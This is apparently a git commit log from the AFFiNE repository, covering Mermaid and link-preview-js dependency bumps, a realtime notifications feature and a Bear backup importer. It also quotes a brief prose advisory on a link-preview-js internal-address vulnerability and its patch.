fix(block): add support for all arrow types in block diagrams

-
[#7587](https://redirect.github.com/mermaid-js/mermaid/pull/7587)
[`5e7eb62`](https://redirect.github.com/mermaid-js/mermaid/commit/5e7eb62e3aba6b5df559f5c839a868e5b7f40e72)
Thanks
[@MaddyGuthridge](https://redirect.github.com/MaddyGuthridge)! -
chore: drop lodash-es in favour of es-toolkit

-
[#7693](https://redirect.github.com/mermaid-js/mermaid/pull/7693)
[`afaf306`](https://redirect.github.com/mermaid-js/mermaid/commit/afaf3062381d115d66744413151b642f124dd9ba)
Thanks [@dull-bird](https://redirect.github.com/dull-bird)! -
fix(quadrant-chart): allow CJK, emoji, Latin-1 accented characters, and
other non-ASCII text in unquoted axis/quadrant/point labels.

Previously the lexer only matched ASCII `[A-Za-z]+` for text tokens,
even though the grammar referenced `UNICODE_TEXT`. Bare Chinese,
Japanese, Korean, emoji, and accented Latin characters in labels caused
a parse error. Added a `[^\x00-\x7F]+` lexer rule to emit `UNICODE_TEXT`
and included it in the `alphaNumToken` grammar rule.

Fixes
[#7120](https://redirect.github.com/mermaid-js/mermaid/issues/7120).

-
[#7737](https://redirect.github.com/mermaid-js/mermaid/pull/7737)
[`4755553`](https://redirect.github.com/mermaid-js/mermaid/commit/4755553d5fb6d1217809e43ffb8fc54d6a73e482)
Thanks
[@ashishjain0512](https://redirect.github.com/ashishjain0512)! -
fix: improve D3 types for mermaidAPI funcs

-
[#7737](https://redirect.github.com/mermaid-js/mermaid/pull/7737)
[`6476973`](https://redirect.github.com/mermaid-js/mermaid/commit/64769738d5b59211e1decb471ffbaca8afec51aa)
Thanks
[@ashishjain0512](https://redirect.github.com/ashishjain0512)! -
fix: handle `&` when namespacing CSS rules

-
[#7520](https://redirect.github.com/mermaid-js/mermaid/pull/7520)
[`8c1a0c1`](https://redirect.github.com/mermaid-js/mermaid/commit/8c1a0c1fd19587c6772d6966fe9d217e5cd1356c)
Thanks
[@RodrigojndSantos](https://redirect.github.com/RodrigojndSantos)!
- fix(stateDiagram): comments starting with one `%` are no longer
treated as comments

  Switch to using two `%%` if you want to write a comment.

- Updated dependencies
\[[`7a8fb85`](https://redirect.github.com/mermaid-js/mermaid/commit/7a8fb8532c57ecc55b3711454ab0e505a4291445),
[`675a64c`](https://redirect.github.com/mermaid-js/mermaid/commit/675a64ca0e3cde8728ca715991623c3fc055ce88)]:
-
[@mermaid-js/parser](https://redirect.github.com/mermaid-js/parser)@1.1.1

###
[`v11.14.0`](https://redirect.github.com/mermaid-js/mermaid/releases/tag/mermaid%4011.14.0)

[Compare
Source](https://redirect.github.com/mermaid-js/mermaid/compare/mermaid@11.13.0...mermaid@11.14.0)

Thanks to our awesome mermaid community that contributed to this
release:
[@ashishjain0512](https://redirect.github.com/ashishjain0512),
[@tractorjuice](https://redirect.github.com/tractorjuice),
[@autofix-ci\[bot\]](https://redirect.github.com/autofix-ci%5Bbot%5D),
[@aloisklink](https://redirect.github.com/aloisklink),
[@knsv](https://redirect.github.com/knsv),
[@kibanana](https://redirect.github.com/kibanana),
[@chandershekhar22](https://redirect.github.com/chandershekhar22),
[@khalil](https://redirect.github.com/khalil),
[@ytatsuno](https://redirect.github.com/ytatsuno),
[@sidharthv96](https://redirect.github.com/sidharthv96),
[@github-actions\[bot\]](https://redirect.github.com/github-actions%5Bbot%5D),
[@dripcoding](https://redirect.github.com/dripcoding),
[@knsv-bot](https://redirect.github.com/knsv-bot),
[@jeroensmink98](https://redirect.github.com/jeroensmink98),
[@Alex9583](https://redirect.github.com/Alex9583),
[@GhassenS](https://redirect.github.com/GhassenS),
[@omkarht](https://redirect.github.com/omkarht),
[@darshanr0107](https://redirect.github.com/darshanr0107),
[@leentaylor](https://redirect.github.com/leentaylor),
[@lee-treehouse](https://redirect.github.com/lee-treehouse),
[@veeceey](https://redirect.github.com/veeceey),
[@turntrout](https://redirect.github.com/turntrout),
[@Mermaid-Chart](https://redirect.github.com/Mermaid-Chart),
[@BambioGaming](https://redirect.github.com/BambioGaming), Claude

### Releases

####
[@&#8203;mermaid-js/examples](https://redirect.github.com/mermaid-js/examples)@&#8203;1.2.0

##### Minor Changes

-
[#&#8203;7526](https://redirect.github.com/mermaid-js/mermaid/pull/7526)
[`efe218a`](https://redirect.github.com/mermaid-js/mermaid/commit/efe218a47fb5a4c2bd5489b48ce69213b141e519)
- add new TreeView diagram

#### mermaid\@&#8203;11.14.0

##### Minor Changes

-
[#&#8203;7526](https://redirect.github.com/mermaid-js/mermaid/pull/7526)
[`efe218a`](https://redirect.github.com/mermaid-js/mermaid/commit/efe218a47fb5a4c2bd5489b48ce69213b141e519)
- Add Wardley Maps diagram type (beta)

Adds Wardley Maps as a new diagram type to Mermaid (available as
`wardley-beta`). Wardley Maps are visual representations of business
strategy that help map value chains and component evolution.

  Features:

- Component positioning with \[visibility, evolution] coordinates (OWM
format)
  - Anchors for users/customers
  - Multiple link types: dependencies, flows, labeled links
  - Evolution arrows and trend indicators
  - Custom evolution stages with optional dual labels
- Custom stage widths using
[@&#8203;boundary](https://redirect.github.com/boundary) notation
  - Pipeline components with visibility inheritance
  - Annotations, notes, and visual elements
  - Source strategy markers: build, buy, outsource, market
  - Inertia indicators
  - Theme integration

Implementation includes parser, D3.js renderer, unit tests, E2E tests,
and comprehensive documentation.

-
[#&#8203;7526](https://redirect.github.com/mermaid-js/mermaid/pull/7526)
[`efe218a`](https://redirect.github.com/mermaid-js/mermaid/commit/efe218a47fb5a4c2bd5489b48ce69213b141e519)
- feat: implement neo look styling for state diagrams

-
[#&#8203;7526](https://redirect.github.com/mermaid-js/mermaid/pull/7526)
[`efe218a`](https://redirect.github.com/mermaid-js/mermaid/commit/efe218a47fb5a4c2bd5489b48ce69213b141e519)
- feat: implement neo look support for sequence diagrams with drop
shadows, and enhanced styling

-
[#&#8203;7526](https://redirect.github.com/mermaid-js/mermaid/pull/7526)
[`efe218a`](https://redirect.github.com/mermaid-js/mermaid/commit/efe218a47fb5a4c2bd5489b48ce69213b141e519)
- feat: add `randomize` config option for architecture diagrams,
defaulting to `false` for deterministic layout

-
[#&#8203;7526](https://redirect.github.com/mermaid-js/mermaid/pull/7526)
[`efe218a`](https://redirect.github.com/mermaid-js/mermaid/commit/efe218a47fb5a4c2bd5489b48ce69213b141e519)
- feat: Add option to change timeline direction

-
[#&#8203;7526](https://redirect.github.com/mermaid-js/mermaid/pull/7526)
[`efe218a`](https://redirect.github.com/mermaid-js/mermaid/commit/efe218a47fb5a4c2bd5489b48ce69213b141e519)
- Fix duplicate SVG element IDs when rendering multiple diagrams on the
same page. Internal element IDs (nodes, edges, markers, clusters) are
now prefixed with the diagram's SVG element ID across all diagram types.
Custom CSS or JS using exact ID selectors like `#arrowhead` should use
attribute-ending selectors like `[id$="-arrowhead"]` instead.

-
[#&#8203;7526](https://redirect.github.com/mermaid-js/mermaid/pull/7526)
[`efe218a`](https://redirect.github.com/mermaid-js/mermaid/commit/efe218a47fb5a4c2bd5489b48ce69213b141e519)
- feat: implement neo look styling for ER diagrams

-
[#&#8203;7526](https://redirect.github.com/mermaid-js/mermaid/pull/7526)
[`efe218a`](https://redirect.github.com/mermaid-js/mermaid/commit/efe218a47fb5a4c2bd5489b48ce69213b141e519)
- feat: implement neo look styling for requirement diagrams

-
[#&#8203;7526](https://redirect.github.com/mermaid-js/mermaid/pull/7526)
[`efe218a`](https://redirect.github.com/mermaid-js/mermaid/commit/efe218a47fb5a4c2bd5489b48ce69213b141e519)
- feat: add theme support for data label colour in xy chart

-
[#&#8203;7526](https://redirect.github.com/mermaid-js/mermaid/pull/7526)
[`efe218a`](https://redirect.github.com/mermaid-js/mermaid/commit/efe218a47fb5a4c2bd5489b48ce69213b141e519)
- feat: implement neo look styling for mindmap diagrams

-
[#&#8203;7526](https://redirect.github.com/mermaid-js/mermaid/pull/7526)
[`efe218a`](https://redirect.github.com/mermaid-js/mermaid/commit/efe218a47fb5a4c2bd5489b48ce69213b141e519)
- feat: implement neo look for mermaid flowchart diagrams

-
[#&#8203;7526](https://redirect.github.com/mermaid-js/mermaid/pull/7526)
[`efe218a`](https://redirect.github.com/mermaid-js/mermaid/commit/efe218a47fb5a4c2bd5489b48ce69213b141e519)
- feat: implement neo look and themes for class diagram

-
[#&#8203;7526](https://redirect.github.com/mermaid-js/mermaid/pull/7526)
[`efe218a`](https://redirect.github.com/mermaid-js/mermaid/commit/efe218a47fb5a4c2bd5489b48ce69213b141e519)
- feat: add showDataLabelOutsideBar option for xy chart

-
[#&#8203;7526](https://redirect.github.com/mermaid-js/mermaid/pull/7526)
[`efe218a`](https://redirect.github.com/mermaid-js/mermaid/commit/efe218a47fb5a4c2bd5489b48ce69213b141e519)
- feat: implement neo look support for timeline diagram with drop
shadows, additional redux themes and enhanced styling

-
[#&#8203;7526](https://redirect.github.com/mermaid-js/mermaid/pull/7526)
[`efe218a`](https://redirect.github.com/mermaid-js/mermaid/commit/efe218a47fb5a4c2bd5489b48ce69213b141e519)
- feat: implement neo look and themes for gitGraph diagram

-
[#&#8203;7526](https://redirect.github.com/mermaid-js/mermaid/pull/7526)
[`efe218a`](https://redirect.github.com/mermaid-js/mermaid/commit/efe218a47fb5a4c2bd5489b48ce69213b141e519)
- add new TreeView diagram

##### Patch Changes

-
[#&#8203;7526](https://redirect.github.com/mermaid-js/mermaid/pull/7526)
[`efe218a`](https://redirect.github.com/mermaid-js/mermaid/commit/efe218a47fb5a4c2bd5489b48ce69213b141e519)
- add link to ishikawa diagram on mermaid.js.org

-
[#&#8203;7526](https://redirect.github.com/mermaid-js/mermaid/pull/7526)
[`efe218a`](https://redirect.github.com/mermaid-js/mermaid/commit/efe218a47fb5a4c2bd5489b48ce69213b141e519)
- docs: document valid duration token formats in gantt.md

-
[#&#8203;7526](https://redirect.github.com/mermaid-js/mermaid/pull/7526)
[`efe218a`](https://redirect.github.com/mermaid-js/mermaid/commit/efe218a47fb5a4c2bd5489b48ce69213b141e519)
- fix: ER diagram parsing when using "1" as entity identifier on right
side

The parser was incorrectly tokenizing the second "1" in patterns like `a
many to 1 1:` because the lookahead rule only checked for alphabetic
characters after whitespace, not digits. Added a new lookahead pattern
`"1"(?=\s+[0-9])` to correctly identify the cardinality alias before a
numeric entity name.

Fixes
[#&#8203;7472](https://redirect.github.com/mermaid-js/mermaid/issues/7472)

-
[#&#8203;7526](https://redirect.github.com/mermaid-js/mermaid/pull/7526)
[`efe218a`](https://redirect.github.com/mermaid-js/mermaid/commit/efe218a47fb5a4c2bd5489b48ce69213b141e519)
- fix: scope cytoscape label style mapping to edges with labels to
prevent console warnings

-
[#&#8203;7526](https://redirect.github.com/mermaid-js/mermaid/pull/7526)
[`efe218a`](https://redirect.github.com/mermaid-js/mermaid/commit/efe218a47fb5a4c2bd5489b48ce69213b141e519)
- fix: support inline annotation syntax in class diagrams (class Shape
<<interface>>)

-
[#&#8203;7526](https://redirect.github.com/mermaid-js/mermaid/pull/7526)
[`efe218a`](https://redirect.github.com/mermaid-js/mermaid/commit/efe218a47fb5a4c2bd5489b48ce69213b141e519)
- fix: Align branch label background with text for multi-line labels in
LR GitGraph layout

-
[#&#8203;7526](https://redirect.github.com/mermaid-js/mermaid/pull/7526)
[`efe218a`](https://redirect.github.com/mermaid-js/mermaid/commit/efe218a47fb5a4c2bd5489b48ce69213b141e519)
- fix: preserve cause hierarchy when ishikawa effect is indented more
than causes

-
[#&#8203;7526](https://redirect.github.com/mermaid-js/mermaid/pull/7526)
[`efe218a`](https://redirect.github.com/mermaid-js/mermaid/commit/efe218a47fb5a4c2bd5489b48ce69213b141e519)
- refactor: remove unused createGraphWithElements function and add
regression test for open edge arrowheads

-
[#&#8203;7526](https://redirect.github.com/mermaid-js/mermaid/pull/7526)
[`efe218a`](https://redirect.github.com/mermaid-js/mermaid/commit/efe218a47fb5a4c2bd5489b48ce69213b141e519)
- fix: Prevent long pie chart titles from being clipped by expanding the
viewBox

-
[#&#8203;7526](https://redirect.github.com/mermaid-js/mermaid/pull/7526)
[`efe218a`](https://redirect.github.com/mermaid-js/mermaid/commit/efe218a47fb5a4c2bd5489b48ce69213b141e519)
- fix: prevent sequence diagram hang when "as" is used without a
trailing space in participant declarations

-
[#&#8203;7526](https://redirect.github.com/mermaid-js/mermaid/pull/7526)
[`efe218a`](https://redirect.github.com/mermaid-js/mermaid/commit/efe218a47fb5a4c2bd5489b48ce69213b141e519)
- fix: warn when `style` statement targets a non-existent node in
flowcharts

-
[#&#8203;7526](https://redirect.github.com/mermaid-js/mermaid/pull/7526)
[`efe218a`](https://redirect.github.com/mermaid-js/mermaid/commit/efe218a47fb5a4c2bd5489b48ce69213b141e519)
- fix: group state diagram SVG children under single root <g> element

-
[#&#8203;7526](https://redirect.github.com/mermaid-js/mermaid/pull/7526)
[`efe218a`](https://redirect.github.com/mermaid-js/mermaid/commit/efe218a47fb5a4c2bd5489b48ce69213b141e519)
- fix: Allow :::className syntax inside composite state blocks

-
[#&#8203;7526](https://redirect.github.com/mermaid-js/mermaid/pull/7526)
[`efe218a`](https://redirect.github.com/mermaid-js/mermaid/commit/efe218a47fb5a4c2bd5489b48ce69213b141e519)
Thanks [@&#8203;aloisklink](https://redirect.github.com/aloisklink),
[@&#8203;BambioGaming](https://redirect.github.com/BambioGaming)! - fix:
prevent escaping `<` and `&` when `htmlLabels: false`

-
[#&#8203;7526](https://redirect.github.com/mermaid-js/mermaid/pull/7526)
[`efe218a`](https://redirect.github.com/mermaid-js/mermaid/commit/efe218a47fb5a4c2bd5489b48ce69213b141e519)
- fix: treemap title and labels use theme-aware colors for dark
backgrounds

- Updated dependencies
\[[`efe218a`](https://redirect.github.com/mermaid-js/mermaid/commit/efe218a47fb5a4c2bd5489b48ce69213b141e519)]:
-
[@&#8203;mermaid-js/parser](https://redirect.github.com/mermaid-js/parser)@&#8203;1.1.0

####
[@&#8203;mermaid-js/parser](https://redirect.github.com/mermaid-js/parser)@&#8203;1.1.0

##### Minor Changes

-
[#&#8203;7526](https://redirect.github.com/mermaid-js/mermaid/pull/7526)
[`efe218a`](https://redirect.github.com/mermaid-js/mermaid/commit/efe218a47fb5a4c2bd5489b48ce69213b141e519)
- add new TreeView diagram

####
[@&#8203;mermaid-js/tiny](https://redirect.github.com/mermaid-js/tiny)@&#8203;11.14.0

##### Minor Changes

-
[#&#8203;7526](https://redirect.github.com/mermaid-js/mermaid/pull/7526)
[`efe218a`](https://redirect.github.com/mermaid-js/mermaid/commit/efe218a47fb5a4c2bd5489b48ce69213b141e519)
- Add Wardley Maps diagram type (beta)

Adds Wardley Maps as a new diagram type to Mermaid (available as
`wardley-beta`). Wardley Maps are visual representations of business
strategy that help map value chains and component evolution.

  Features:

- Component positioning with \[visibility, evolution] coordinates (OWM
format)
  - Anchors for users/customers
  - Multiple link types: dependencies, flows, labeled links
  - Evolution arrows and trend indicators
  - Custom evolution stages with optional dual labels
- Custom stage widths using
[@&#8203;boundary](https://redirect.github.com/boundary) notation
  - Pipeline components with visibility inheritance
  - Annotations, notes, and visual elements
  - Source strategy markers: build, buy, outsource, market
  - Inertia indicators
  - Theme integration

Implementation includes parser, D3.js renderer, unit tests, E2E tests,
and comprehensive documentation.

-
[#&#8203;7526](https://redirect.github.com/mermaid-js/mermaid/pull/7526)
[`efe218a`](https://redirect.github.com/mermaid-js/mermaid/commit/efe218a47fb5a4c2bd5489b48ce69213b141e519)
- feat: implement neo look styling for state diagrams

-
[#&#8203;7526](https://redirect.github.com/mermaid-js/mermaid/pull/7526)
[`efe218a`](https://redirect.github.com/mermaid-js/mermaid/commit/efe218a47fb5a4c2bd5489b48ce69213b141e519)
- feat: implement neo look support for sequence diagrams with drop
shadows, and enhanced styling

-
[#&#8203;7526](https://redirect.github.com/mermaid-js/mermaid/pull/7526)
[`efe218a`](https://redirect.github.com/mermaid-js/mermaid/commit/efe218a47fb5a4c2bd5489b48ce69213b141e519)
- feat: add `randomize` config option for architecture diagrams,
defaulting to `false` for deterministic layout

-
[#&#8203;7526](https://redirect.github.com/mermaid-js/mermaid/pull/7526)
[`efe218a`](https://redirect.github.com/mermaid-js/mermaid/commit/efe218a47fb5a4c2bd5489b48ce69213b141e519)
- feat: Add option to change timeline direction

-
[#&#8203;7526](https://redirect.github.com/mermaid-js/mermaid/pull/7526)
[`efe218a`](https://redirect.github.com/mermaid-js/mermaid/commit/efe218a47fb5a4c2bd5489b48ce69213b141e519)
- Fix duplicate SVG element IDs when rendering multiple diagrams on the
same page. Internal element IDs (nodes, edges, markers, clusters) are
now prefixed with the diagram's SVG element ID across all diagram types.
Custom CSS or JS using exact ID selectors like `#arrowhead` should use
attribute-ending selectors like `[id$="-arrowhead"]` instead.

-
[#&#8203;7526](https://redirect.github.com/mermaid-js/mermaid/pull/7526)
[`efe218a`](https://redirect.github.com/mermaid-js/mermaid/commit/efe218a47fb5a4c2bd5489b48ce69213b141e519)
- feat: implement neo look styling for ER diagrams

-
[#&#8203;7526](https://redirect.github.com/mermaid-js/mermaid/pull/7526)
[`efe218a`](https://redirect.github.com/mermaid-js/mermaid/commit/efe218a47fb5a4c2bd5489b48ce69213b141e519)
- feat: implement neo look styling for requirement diagrams

-
[#&#8203;7526](https://redirect.github.com/mermaid-js/mermaid/pull/7526)
[`efe218a`](https://redirect.github.com/mermaid-js/mermaid/commit/efe218a47fb5a4c2bd5489b48ce69213b141e519)
- feat: add theme support for data label colour in xy chart

-
[#&#8203;7526](https://redirect.github.com/mermaid-js/mermaid/pull/7526)
[`efe218a`](https://redirect.github.com/mermaid-js/mermaid/commit/efe218a47fb5a4c2bd5489b48ce69213b141e519)
- feat: implement neo look styling for mindmap diagrams

-
[#&#8203;7526](https://redirect.github.com/mermaid-js/mermaid/pull/7526)
[`efe218a`](https://redirect.github.com/mermaid-js/mermaid/commit/efe218a47fb5a4c2bd5489b48ce69213b141e519)
- feat: implement neo look for mermaid flowchart diagrams

-
[#&#8203;7526](https://redirect.github.com/mermaid-js/mermaid/pull/7526)
[`efe218a`](https://redirect.github.com/mermaid-js/mermaid/commit/efe218a47fb5a4c2bd5489b48ce69213b141e519)
- feat: implement neo look and themes for class diagram

-
[#&#8203;7526](https://redirect.github.com/mermaid-js/mermaid/pull/7526)
[`efe218a`](https://redirect.github.com/mermaid-js/mermaid/commit/efe218a47fb5a4c2bd5489b48ce69213b141e519)
- feat: add showDataLabelOutsideBar option for xy chart

-
[#&#8203;7526](https://redirect.github.com/mermaid-js/mermaid/pull/7526)
[`efe218a`](https://redirect.github.com/mermaid-js/mermaid/commit/efe218a47fb5a4c2bd5489b48ce69213b141e519)
- feat: implement neo look support for timeline diagram with drop
shadows, additional redux themes and enhanced styling

-
[#&#8203;7526](https://redirect.github.com/mermaid-js/mermaid/pull/7526)
[`efe218a`](https://redirect.github.com/mermaid-js/mermaid/commit/efe218a47fb5a4c2bd5489b48ce69213b141e519)
- feat: implement neo look and themes for gitGraph diagram

-
[#&#8203;7526](https://redirect.github.com/mermaid-js/mermaid/pull/7526)
[`efe218a`](https://redirect.github.com/mermaid-js/mermaid/commit/efe218a47fb5a4c2bd5489b48ce69213b141e519)
- add new TreeView diagram

##### Patch Changes

-
[#&#8203;7526](https://redirect.github.com/mermaid-js/mermaid/pull/7526)
[`efe218a`](https://redirect.github.com/mermaid-js/mermaid/commit/efe218a47fb5a4c2bd5489b48ce69213b141e519)
- add link to ishikawa diagram on mermaid.js.org

-
[#&#8203;7526](https://redirect.github.com/mermaid-js/mermaid/pull/7526)
[`efe218a`](https://redirect.github.com/mermaid-js/mermaid/commit/efe218a47fb5a4c2bd5489b48ce69213b141e519)
- docs: document valid duration token formats in gantt.md

-
[#&#8203;7526](https://redirect.github.com/mermaid-js/mermaid/pull/7526)
[`efe218a`](https://redirect.github.com/mermaid-js/mermaid/commit/efe218a47fb5a4c2bd5489b48ce69213b141e519)
- fix: ER diagram parsing when using "1" as entity identifier on right
side

The parser was incorrectly tokenizing the second "1" in patterns like `a
many to 1 1:` because the lookahead rule only checked for alphabetic
characters after whitespace, not digits. Added a new lookahead pattern
`"1"(?=\s+[0-9])` to correctly identify the cardinality alias before a
numeric entity name.

Fixes
[#&#8203;7472](https://redirect.github.com/mermaid-js/mermaid/issues/7472)

-
[#&#8203;7526](https://redirect.github.com/mermaid-js/mermaid/pull/7526)
[`efe218a`](https://redirect.github.com/mermaid-js/mermaid/commit/efe218a47fb5a4c2bd5489b48ce69213b141e519)
- fix: scope cytoscape label style mapping to edges with labels to
prevent console warnings

-
[#&#8203;7526](https://redirect.github.com/mermaid-js/mermaid/pull/7526)
[`efe218a`](https://redirect.github.com/mermaid-js/mermaid/commit/efe218a47fb5a4c2bd5489b48ce69213b141e519)
- fix: support inline annotation syntax in class diagrams (class Shape
<<interface>>)

-
[#&#8203;7526](https://redirect.github.com/mermaid-js/mermaid/pull/7526)
[`efe218a`](https://redirect.github.com/mermaid-js/mermaid/commit/efe218a47fb5a4c2bd5489b48ce69213b141e519)
- fix: Align branch label background with text for multi-line labels in
LR GitGraph layout

-
[#&#8203;7526](https://redirect.github.com/mermaid-js/mermaid/pull/7526)
[`efe218a`](https://redirect.github.com/mermaid-js/mermaid/commit/efe218a47fb5a4c2bd5489b48ce69213b141e519)
- fix: preserve cause hierarchy when ishikawa effect is indented more
than causes

-
[#&#8203;7526](https://redirect.github.com/mermaid-js/mermaid/pull/7526)
[`efe218a`](https://redirect.github.com/mermaid-js/mermaid/commit/efe218a47fb5a4c2bd5489b48ce69213b141e519)
- refactor: remove unused createGraphWithElements function and add
regression test for open edge arrowheads

-
[#&#8203;7526](https://redirect.github.com/mermaid-js/mermaid/pull/7526)
[`efe218a`](https://redirect.github.com/mermaid-js/mermaid/commit/efe218a47fb5a4c2bd5489b48ce69213b141e519)
- fix: Prevent long pie chart titles from being clipped by expanding the
viewBox

-
[#&#8203;7526](https://redirect.github.com/mermaid-js/mermaid/pull/7526)
[`efe218a`](https://redirect.github.com/mermaid-js/mermaid/commit/efe218a47fb5a4c2bd5489b48ce69213b141e519)
- fix: prevent sequence diagram hang when "as" is used without a
trailing space in participant declarations

-
[#&#8203;7526](https://redirect.github.com/mermaid-js/mermaid/pull/7526)
[`efe218a`](https://redirect.github.com/mermaid-js/mermaid/commit/efe218a47fb5a4c2bd5489b48ce69213b141e519)
- fix: warn when `style` statement targets a non-existent node in
flowcharts

-
[#&#8203;7526](https://redirect.github.com/mermaid-js/mermaid/pull/7526)
[`efe218a`](https://redirect.github.com/mermaid-js/mermaid/commit/efe218a47fb5a4c2bd5489b48ce69213b141e519)
- fix: group state diagram SVG children under single root <g> element

-
[#&#8203;7526](https://redirect.github.com/mermaid-js/mermaid/pull/7526)
[`efe218a`](https://redirect.github.com/mermaid-js/mermaid/commit/efe218a47fb5a4c2bd5489b48ce69213b141e519)
- fix: Allow :::className syntax inside composite state blocks

-
[#&#8203;7526](https://redirect.github.com/mermaid-js/mermaid/pull/7526)
[`efe218a`](https://redirect.github.com/mermaid-js/mermaid/commit/efe218a47fb5a4c2bd5489b48ce69213b141e519)
Thanks [@&#8203;aloisklink](https://redirect.github.com/aloisklink),
[@&#8203;BambioGaming](https://redirect.github.com/BambioGaming)! - fix:
prevent escaping `<` and `&` when `htmlLabels: false`

-
[#&#8203;7526](https://redirect.github.com/mermaid-js/mermaid/pull/7526)
[`efe218a`](https://redirect.github.com/mermaid-js/mermaid/commit/efe218a47fb5a4c2bd5489b48ce69213b141e519)
- fix: treemap title and labels use theme-aware colors for dark
backgrounds

- Updated dependencies
\[[`efe218a`](https://redirect.github.com/mermaid-js/mermaid/commit/efe218a47fb5a4c2bd5489b48ce69213b141e519)]:
-
[@&#8203;mermaid-js/parser](https://redirect.github.com/mermaid-js/parser)@&#8203;1.1.0

</details>

---

### Configuration

📅 **Schedule**: (UTC)

- Branch creation
  - ""
- Automerge
  - At any time (no schedule defined)

🚦 **Automerge**: Disabled by config. Please merge this manually once you
are satisfied.

♻ **Rebasing**: Whenever PR becomes conflicted, or you tick the
rebase/retry checkbox.

🔕 **Ignore**: Close this PR and you won't be reminded about this update
again.

---

- [ ] <!-- rebase-check -->If you want to rebase/retry this PR, check
this box

---

This PR was generated by [Mend Renovate](https://mend.io/renovate/).
View the [repository job
log](https://developer.mend.io/github/toeverything/AFFiNE).


Co-authored-by: renovate[bot] <29139614+renovate[bot]@users.noreply.github.com>
2026-05-12 16:20:41 +08:00
DarkSky 8cf00738c2 feat(server): realtime notification & task status (#14934)
#### PR Dependency Tree


* **PR #14934** 👈

This tree was auto-generated by
[Charcoal](https://github.com/danerwilliams/charcoal)

<!-- This is an auto-generated comment: release notes by coderabbit.ai
-->
## Summary by CodeRabbit

* **New Features**
* Full realtime platform added: live notifications, comments, embedding
progress, and transcription task updates via realtime subscriptions.

* **Chores**
* Frontend switched from polling/GraphQL queries to realtime channels;
legacy query fields marked deprecated and client libs updated to use
realtime APIs.

[![Review Change
Stack](https://storage.googleapis.com/coderabbit_public_assets/review-stack-in-coderabbit-ui.svg)](https://app.coderabbit.ai/change-stack/toeverything/AFFiNE/pull/14934)
<!-- end of auto-generated comment: release notes by coderabbit.ai -->


#### PR Dependency Tree


* **PR #14934** 👈
  * **PR #14936**

This tree was auto-generated by
[Charcoal](https://github.com/danerwilliams/charcoal)
2026-05-10 23:21:50 +08:00
karl-kaefer ac37d07e74 feat(editor): add Bear backup import and markdown zip folder hierarchy (#14599)
## Summary

- Add Bear `.bear2bk` backup importer (TextBundle-based zip format)
- Enhance markdown zip import to preserve folder structure from zip
paths
- Add colored highlight (`<mark data-color="...">`) support to HTML
adapter

### Bear Import Details

Bear backups are zip archives of TextBundle directories. The importer:
- Parses Bear-specific markdown (highlights `==text==`, callouts `>
[!NOTE]`, inline tags `#tag`)
- Extracts creation/modification dates from `info.json` metadata
- Filters out trashed notes
- Converts Bear tags to AFFiNE tags (consolidated by root segment)
- Builds folder hierarchy from nested tag paths (e.g.,
`#work/projects/alpha`)
- Uses JSZip for lazy decompression to handle large backups without OOM

### Markdown Zip Folder Hierarchy

`importMarkdownZip` now returns `{ docIds, folderHierarchy }` instead of
just `docIds[]`, enabling the UI to recreate the zip's directory
structure as AFFiNE folders.

## Related Issues

- Implements the TextBundle-based import approach suggested in #14115 /
Discussion #14142
- Addresses folder structure preservation requested in #10003
- Partially addresses frontmatter metadata import from #11286

## Test Plan

- [ ] Import a Bear `.bear2bk` backup file via the import dialog
- [ ] Verify tags are created and assigned to documents
- [ ] Verify folder hierarchy matches Bear's nested tag structure
- [ ] Verify creation/modification dates are preserved
- [ ] Verify highlighted text and callouts render correctly
- [ ] Verify images and attachments are imported
- [ ] Import a markdown zip with nested folders, verify folder structure
is recreated
- [ ] Verify trashed Bear notes are excluded

<!-- This is an auto-generated comment: release notes by coderabbit.ai
-->
## Summary by CodeRabbit

* **New Features**
* Bear (.bear2bk) backup import: bulk import notes, convert/dedupe tags,
create nested folders, and return imported doc IDs plus folder
hierarchy; UI import option and progress integrated.
* Markdown ZIP import now returns an optional folder hierarchy alongside
created doc IDs.

* **Bug Fixes / Improvements**
* Highlighting: mark elements validate color names, default safely, and
apply consistent background styling.

* **Chores**
  * Added runtime dependency for ZIP handling.

* **Documentation**
  * Added localization strings and i18n accessors for Bear import UI.
<!-- end of auto-generated comment: release notes by coderabbit.ai -->

---------

Co-authored-by: DarkSky <25152247+darkskygit@users.noreply.github.com>
2026-05-07 11:29:40 +08:00
renovate[bot] 429e7f495d chore: bump up link-preview-js version to v4.0.1 [SECURITY] (#14917)
This PR contains the following updates:

| Package | Change |
[Age](https://docs.renovatebot.com/merge-confidence/) |
[Confidence](https://docs.renovatebot.com/merge-confidence/) |
|---|---|---|---|
|
[link-preview-js](https://redirect.github.com/OP-Engineering/link-preview-js)
| [`4.0.0` →
`4.0.1`](https://renovatebot.com/diffs/npm/link-preview-js/4.0.0/4.0.1)
|
![age](https://developer.mend.io/api/mc/badges/age/npm/link-preview-js/4.0.1?slim=true)
|
![confidence](https://developer.mend.io/api/mc/badges/confidence/npm/link-preview-js/4.0.0/4.0.1?slim=true)
|

---

### link-preview-js vulnerable to IPv6 and internal loopback attacks
[CVE-2026-43897](https://nvd.nist.gov/vuln/detail/CVE-2026-43897) /
[GHSA-4gp8-rjrq-ch6q](https://redirect.github.com/advisories/GHSA-4gp8-rjrq-ch6q)

<details>
<summary>More information</summary>

#### Details
##### Impact
The library did not check for IPv6 loopback attacks. There was also a
DNS attack, where an address could be resolved into an internal IP. This
could cause internal data leaks.

##### Patches
Problem has been patched in version 4.0.1. However, it cannot be
completely solved by the package alone. The regex used for validation
has been tightened for IPv6 addresses.

The DNS resolving, however, is more difficult. The regex has been
tightened to prohibit .internal, .local, .nip.io and .sslip.io
addresses, however there can be other services not on the list,
therefore it is imperative that users use the resolveDNSHost option to
do DNS resolution before fetching content. To that regard a (scary)
error message has been added when the option is not set.

##### Workarounds
Users can do their own validation before fetching content.

Reported by https://github.com/Andrew-most-likely

#### Severity
- CVSS Score: 8.7 / 10 (High)
- Vector String:
`CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:H/VI:N/VA:N/SC:N/SI:N/SA:N`

#### References
-
[https://github.com/OP-Engineering/link-preview-js/security/advisories/GHSA-4gp8-rjrq-ch6q](https://redirect.github.com/OP-Engineering/link-preview-js/security/advisories/GHSA-4gp8-rjrq-ch6q)
-
[https://github.com/OP-Engineering/link-preview-js/pull/179](https://redirect.github.com/OP-Engineering/link-preview-js/pull/179)
-
[https://github.com/OP-Engineering/link-preview-js/commit/4396d48909fab37553c0e93e26447fe218363ede](https://redirect.github.com/OP-Engineering/link-preview-js/commit/4396d48909fab37553c0e93e26447fe218363ede)
-
